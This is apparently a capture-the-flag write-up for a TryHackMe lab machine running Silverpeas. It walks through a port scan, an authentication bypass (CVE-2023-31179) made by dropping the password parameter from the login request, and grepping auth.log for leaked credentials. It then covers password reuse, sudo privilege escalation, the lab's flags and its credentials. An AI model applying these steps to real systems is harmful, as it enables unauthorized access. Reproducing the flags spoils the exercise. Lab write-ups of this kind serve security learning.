Rust scan showed three ports open 22,80,8080
rustscan -a 10.10.167.171
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
_______________________________
RustScan: Where '404 Not Found' meets '200 OK'.
Open 10.10.167.171:22
Open 10.10.167.171:80
Open 10.10.167.171:8080
Visiting port 80, I found a new little website, but I did not see a lot going on. I did find a possible username, scr1ptkiddy, and an app named Silverpeas. I was not aware of the service Silverpeas. I quick Google search revealed that it is a type of social media document manager software.
I also went to port 8080, but the website only had a 404 message. Running Gobuster did not bring up much. So, as a long shot, I thought I would manually try /silverpeas on both port 80 and port 8080. Sure enough, port 8080 brought up a logon screen.
I tried a few basic passwords with admin and scr1ptkiddy, but no luck. I looked for any known vulnerabilities. I found a CVE-2023-31179 for authentication bypass, so that sounded promising. Firing up Burp Suite, it looks like all I have to do is remove the &password= field from the request,t and it will bypass the login.
Login=SilverAdmin&Password=SilverAdmin&DomainId=0 (Before) Login=SilverAdmin&DomainId=0 (After)
Trying this with the known user of scr1ptkiddy worked!! Looking around with the user, I did not find much. A message about game night, I tried a bunch of things, including another CVE, which I could not get to work at all. I opened the directory and noted the other users. One named Manager and the other named Administratuer.
I tried logging in with the administrator account spelled both ways, but I was greeted with an odd error of Technical Problem. Now I will not go into the details of all the things I tried with no luck. I later tried to log in with the Manager account using the same trick, and sure enough, it worked. There were three messages, but only one mattered.
Sitting in the messages was the information for an SSH login with the user Tim and a password of cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
At this point, I was feeling pretty happy. I logged onto SSH and found the user.txt file.
THM{c4ca4238a0b923820dcc509a6f75849b}
I went ahead and created/tmp so I can upload Linpeas with my Python server. I did not find a ton of things that worked. But I did see my user was in a group called adm.
So I ran a find command to see what files I could read/write to with that group
uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm) find / -group adm 2>/dev/null /var/log/auth.log
I decided to grep auth.log to see if I could find any good information.
grep -i "sudo\|password\|pkexec\|tty" /var/log/auth.log*
/var/log/auth.log.2:Dec 13 15:40:33 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run –name postgresql -d -e POSTGRES_PASSWORD=_Zd_zx7N823/ -v postgresql-data:/var/lib/postgresql/data postgres:12.3
/var/log/auth.log.2:Dec 12 19:31:36 silver-platter useradd[674]: add ‘tyler’ to group ‘sudo’ /var/log/auth.log.2:Dec 12 19:31:36 silver-platter useradd[674]: add ‘tyler’ to shadow group ‘sudo’
So we know the user Tyler is in the sudo group, and we have a database password. With any password, I find I always try it on a user just in case it was reused.
tim@silver-platter:/tmp$ su tyler Password: tyler@silver-platter:/tmp$
Well, that was not expected, but that looks to be Tyler’s password.
So I ran sudo -l to see what he can run, and well,l looks like everything 🙂
tyler@silver-platter:/tmp$ sudo -l [sudo] password for tyler:
Matching Defaults entries for tyler on silver-platter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty. User Tyler may run the following commands on silver-platter: (ALL : ALL) ALL
cat /root/root.txt THM{098f6bcd4621d373cade4e832627b4f6}